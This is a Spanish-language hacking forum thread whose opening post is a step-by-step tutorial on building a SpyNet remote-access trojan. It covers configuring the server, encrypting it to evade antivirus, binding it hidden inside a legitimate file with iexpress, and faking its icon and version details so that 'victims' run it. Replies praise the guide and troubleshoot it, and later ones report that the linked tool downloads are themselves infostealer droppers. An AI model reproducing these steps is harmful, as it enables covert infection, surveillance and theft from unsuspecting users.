![]() |
|
|
#1 | |||
|
Guest
Amigos
|
Bueno Como no he visto una tutorial de este grandioso troyano e decidido Hacer una... Espero les sirva de mucho y empezemos:
Necesitan descargar el SpyNet, lo pueden hacer desde aca: Descarga:
Contraseña: Spy-Net Les Recuerdo que ya deben tener su dominio no-ip si no sabes que es esto y como se puede tener aqui lo encuentras
Tambien deben tener los Puertos respectivos Abiertos. si no saben como busquen en el foro ahy muchisimos posts sobre como abrir los puertos Una Ves Descargado el Troyano, lo Ejecutamos y Si les aparese un mensaje como este Den click en desbloquear, asi los puertos por defecto que lleva el troyano se abriran automaticamente. Una ves Abierto Sigan los Siguientes Pasos: Damos click en nuevo para empezar a crear nuestro Servidor Ponemos lo respectivo como muestra la imagen Luego damos click en instalasion del servidor y hacemos como se muestra en la imagen Damos click a Arranque y Hacemos lo Siguiente Click a depuracion de lucha y hacemos lo siguiente Damos click a Varios Opciones y Dejamos como en la imagen y Por ultimo damos click en Crear Servidor y Ponemos igual que en la imagen Una Vez Creado el Servidor Es Hora de Acerlo indetectable Ademas de Disfrasarlo con otro ARchivo, Es decir dejarlo una maravilla, Empezamos con los Siguientes Pasos: Primero que nada Encryptamos nuestro server Aqui ahy muchos crypters que pueden ser de gran utilidad.
Una Vez encryptado nuestro server, Ejecutamos el iexpress para juntarlo con otro archivo de esta manera: 1. Inicio 2. Ejecutar 3. Escriben "iexpress" Sin las comillas 4. Dan click en siguiente 5. Click en Siguiente 6. Escriben algo no llamativo como "System" 7. Click a Siguiente 8. Click a Siguiente 9. Suben el Server Ya encryptado y el Programa con el que deseen juntarlo 10. En Install Program Seleccionan el Server y en Post Install Comand Tambien 11. Seleccionan Hidden 12. Dan click a siguiente 13.Dan click en Browse, escriben el nombre con el que deseen que se guarden los archivos juntos, luego dan click en Hide File Extracting... 14. Click a No restart 15. Click a Dont save 16. Click a Siguiente 17. y Click a Finalizar Una Vez nuestro server quede unido a otro archivo cambiaremos algunas cosillas para hacer que paresca mucho mas confiable. Nos descargamos estos dos Grandiosos Programas (ResHacker y Exescope) Descarga: http://www.sendspace.com/file/u7w1rs Reshacker y eXeScope Una Vez Descargados Ejecutamos el Reschaker y Hacemos lo siguiente: Damos click a File, luego a open y seleccionamos nuestro Server unido al otro archivo Una Vez Abierto el archivo Dan click en AVI Luego en 3001 y luego dan click derecho y seleccionan la opcion "Delete Resource" y lo confirman. Una vez echo esto hacen lo mismo pero esta ves no seleccionan Delete Resource sino Replace Resource Dan click en Open file with new icon y seleccionan algun programa con un icono llamativo, lo seleccionan y lo abren.y dan click en Replace. Luego Dan click en File - Save As... y Lo guardan con el nombre que deseen pero recuerden ponerle al final ".exe" y Listo! Nuestro Server queda con el icono Cambiado! Luego de esto Abren El programa ExeScope Dan click en Fichero, luego en Abrir y Seleccionamos nuestro server Una ves echo esto Damos click en Resource Luego a Version y seleccionamos el uno, Luego damos click derecho en "CompanyName" y Cambian el escrito de Value con uno relacionado con el server, Repiten esto con "FileDescription" y Listo, Nuestro Server Quedo Camuflado y muy Llamativo!, Probemoslo Haber que tal nos va... Funciona Perfecto!! Listo, Ya con nuestra victima en el cliente Es hora de Empezar a utilizar las opciones que nos da este maravilloso troyano Tutorial 100% Creada por TheftTime, Respeta los derechos de Autor Espero les haya gustado. |
|||
|
|
|
#2 |
|
Guest
Amigos
|
Buenisimo el tutorial =D *palmas *palmas *palmas *palmas
Q buen comienzo ![]() Saludos! |
|
|
|
#3 |
|
Colaborador
![]() Fecha de Ingreso: julio-2008
Amigos 0
Agradecido 2 veces en 2 mensajes.
|
bueno tutorial :P solo ke la 1º imagen te salio 1 poco cortada pero da = se entiende ;D
|
|
|
#4 |
|
Guest
Amigos
|
es necesario que el no-ip sea .biz, lo digo porque el mio es .info
|
|
|
|
#5 |
|
Guest
Amigos
|
no, puede tener la extensio q vos quieras, mientras sea funcional
|
|
|
|
#6 |
|
Guest
Amigos
|
La contraseña al extraer el rar es incorrecta!!! cual es??
"Spy-Net" no es! ok lo siento, avia que poner un espacio al lado de spy-net, buen trabajo amigo
|
|
|
|
#7 |
|
Veterano
![]() Fecha de Ingreso: febrero-2009
Amigos 0
Agradecido 4 veces en 4 mensajes.
|
gracias x el tuto man
saLUDos!
|
|
|
#8 |
|
Guest
Amigos
|
Gracias a Todos, Pronto modificare la tutorial agregando lo del no-ip y poner indetectable el server Saludos
|
|
|
|
#9 |
|
Colaborador
![]() Fecha de Ingreso: julio-2006
Amigos 1
Agradecido 1 vez en 1 mensaje.
|
muy buen manual, gracias !!, esperare la otra parte del tuto.
|
|
|
#10 |
|
Guest
Amigos
|
Ya termine la modificacion espero les Haya gustado =)
|
|
|
|
#11 |
|
Guest
Amigos
|
Que Grandiosa Tutorial, Me sirvio de pelos! Muchisimas gracias
|
|
|
|
#12 |
|
Master
![]() Fecha de Ingreso: abril-2007
Amigos 16
Agradecido 46 veces en 35 mensajes.
|
aportaso a ponerlo en parctixa
|
|
|
|
#13 |
|
Miembro
![]() Fecha de Ingreso: mayo-2008
Amigos 0
Agradecido 5 veces en 5 mensajes.
|
Esta muy bien explicado, y justo las herramientas necesarias, gracias es de gran ayuda, el unico problemita hay seria el crypter pero bueh, no todo puede ser perfecto.
|
|
|
|
#14 |
|
Guest
Amigos
|
No pongo un crypter porque se que a medida que pase el tiempo sera detectado por todos los antivirus, por eso les dejo ese link ya que se ctualiza constantemente
|
|
|
|
#15 |
|
Recien llegado
![]() Fecha de Ingreso: enero-2009
Amigos 0
Agradecido 0 veces en 0 mensajes.
|
muy buen tuto!!! solo que tengo un proble ya que lo intento usar no me sale nada en el psy-net osea lo ejecuto y no pasa nada, el spy me manda un cartel que dice "serviores online 0 " tendra algo que ver por que ni yo pude auto infectarme gracias.
|
|
|
|
|
|
#16 |
|
Guest
Amigos
|
no desvirtues, en todo caso crea un tema nuevo o usa el consultorio.
Desactivaste el av? |
|
|
|
#17 | |
|
Guest
Amigos
|
Cita:
|
|
|
|
|
#18 |
|
Banned
Amigos 6
Agradecido 45 veces en 29 mensajes.
|
Genial este tuto.
Junto a uno que vi del TurkoJan lo mejor. Saludos! |
|
|
|
|
|
#19 |
|
Guest
Amigos
|
bien, ahora quiero k me expliques un par de cosas TheftTime
1º - pork el EXESCOPE.exe pesa mas k la version descargada de la pagina oficial, y pork detecto dentro de EXESCOPE.exe 5 archivos, y en el oficial, solo hay uno siendo el original 2º - pork EXESCOPE.exe es un dropper de 5 archivos ya me puedes dar una explicacion convincente. un saludo. |
|
|
|
#20 |
|
Banned
Amigos 6
|
¿EOF, has analizado el server?
A mi de primeras mi Norton me ha cogido el único exe que hay como un robador de información infostealer. Ahora voy a ver que nos da en novirusthanks.org SAludos! |
|
|
|
|
|
#21 | |
|
Guest
Amigos
|
Cita:
el server parece k anda limpio pero lo k no anda limpio es la descarga http://www.sendspace.com/file/z373je y espero una explicacion por ello un saludo. |
|
|
|
|
#22 | |||
|
Banned
Amigos 6
|
Nose ???
Mira lo que me salio al darle a analizar el exe, de dentro del rar.
|
|||
|
|
|
|
|
#23 |
|
Guest
Amigos
|
vale el reshacker tambien esta infectado, y ahora ya de paso TheftTime, tambien quiero k me digas que hace acoplado con los dos ejecutables un archivo llamado Crypted1.exe.
mas vale k des una buena explicacion. un saludo. |
|
|
|
#24 |
|
Banned
Amigos 6
|
Si, es raro, pero bueno.
No se como hay gente que en un foro de hackers, se pone a meter keyloggers, o stealers. Saludos! |
|
|
|
|
|
#25 |
|
Guest
Amigos
|
Mis disculpas a todos, es mejor que no descargen aquel programa ya que al pareser esta infectado.
lo coji de otro foro en el que estaba posteado estos dos programas pero pronto subire los programas sin que esten infectados Saludos |
|
![]() |
| Herramientas | |
| Desplegado | |
|
|